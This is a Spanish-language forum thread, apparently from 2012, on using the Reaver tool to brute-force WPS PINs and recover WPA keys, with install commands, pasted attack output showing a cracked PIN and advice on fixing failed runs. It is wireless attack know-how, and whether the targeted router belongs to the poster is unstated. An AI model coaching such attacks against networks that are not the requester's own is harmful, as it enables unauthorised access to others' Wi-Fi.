REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 1 Visitante están viendo este tema.

kupu88

Cita de: P4nd3m0n1um en 13 Marzo 2012, 15:39 PM
3.- Puedes actualizar el reaver bajando el modulo y colocandolo en la carpeta modules

¿Tienes los moludos del reaver actualizado?. Muchas gracias

P4nd3m0n1um

Cita de: kupu88 en 15 Marzo 2012, 17:38 PM
¿Tienes los moludos del reaver actualizado?. Muchas gracias

están en seguridad wireless, en módulos 3.4 o 3.0

Cleantesdeasso

yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...
"Que no!! q el hash hay q crakiarlo!!"

kupu88


P4nd3m0n1um

Cita de: Cleantesdeasso en 15 Marzo 2012, 17:54 PM
yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...

para back|track tenes en los repositorios:

apt-get install reaver

o

apt-get install reaver-wps

o en un terminal:

svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

si no comienza a descargar y da error instala svn. luego:

cd reaver-wps-read-only

cd src

./configure

make

make install

estando conectado.

el modulo de wifiway se puede extraer con el 7zip yo hice un par de módulos en windows..

Borito30

#115
por el momento ya va bien la instalacion
Estoy en contra del foro libre y la Sección de juegos y consolas (distraen al personal)

canastero

haber si alguien me dice si ago algo mal o esta bien todo y no da la contraseña solo me da el pin.La red la proprciona una compañia de andalucia la Mac comienza por 00:1D:CE:2A:XX:XX nombre de la red ARRIS-XXXX router ARRIS

+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
  • Sending EAPOL START request
    [!] WPS transaction failed, re-trying last pin
  • Trying pin 01255676
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WPS transaction failed, re-trying last pin
  • Key cracked in 193 seconds
  • WPS PIN: '01255676'
  • Nothing done, nothing to save.
    wifiway ~ #       

    Un saludo.

P4nd3m0n1um

#117
usa la etiqueta CODE:

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[!] WPS transaction failed, re-trying last pin
[+] Trying pin 01255676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 193 seconds
[+] WPS PIN: '01255676'
[+] Nothing done, nothing to save.
wifiway ~ #      


1.- estas en wifiway, en que wifiway? y con que versión de reaver-wps? cargaste el modulo de la nueva versión?
2.- que calidad de señal tiene el router? wash te ha dado que tiene WPS activado?
3.- se ven errores algo graves:

[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message


se envía el mensaje M2, el router contesta pero reaver no le entiende. Re-envía el mensaje, pero ojo envía un M2D??? cosa que desconozco que es. Segun la pagina de issue de reaver:

Cita de: project memberThe AP is vulnerable, but the received signal strength (RSSI) is almost -90dbm. This is very low. You will need to get closer to the AP or boost your signal with a directional antenna in order to perform this attack.

Cita de: project memberEl AP es vulnerable pero la señal (RSSI) es igual o menor a -90dbm. Esto es muy bajo. Usted tendrá que estar más cerca del punto de acceso o mejorar la señal con una antena direccional con el fin de llevar a cabo este ataque.

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred


quiere decir que se envió el EAPOL pero el router no respondió, por lo tanto esta en timeout!

[!] WPS transaction failed, re-trying last pin

esto quiere decir que probo un pin y el router no contesto a tiempo o no respondió nada.

simplemente el pin es erróneo o el router se bloqueo o se defiende, trata de hacer el ataque por pin como mostré post antes y pon -p 0125 y vemos sino lanza todo de nuevo, ha y si y tienes el reaver viejo, actualizalo.

El ataque debería ser limpio sin errores:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'XXXXXXXXXXXXXX'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.

canastero

#118


Buenas estoy en wifiway 3.4 uso reaver 1.4 es mismo que se ve en tu codigo.El router lo tengo a unos 10 metros me llega la señal exelente asi que ese no es el caso.El reaver wps no escanea nada no me sale nada y si esta activado el wps aparte lo comprobe con wireshark y me da (0x02) por lo que e leido y visto eso quiere decir que si esta activado.Ah si cargue el nuevo modulo.Bueno muchas gracias por ayudarme cuando pruebe con el pin que me dices ya te comento que tal fue todo.

Un Saludo.

canastero

#119

Buenas he probado con ese pin y no busca desde 0 salta siempre el mismo pin y termina igual que antes.
Lo que are es comenzar de nuevo y haber que tal funciona asi.
Me sale el error de M2D que nose que es y tras ese error me sale M6 y vuelta al mismo pin hasta que termina y solo me da el pin pero no la contraseña..

Un saludo.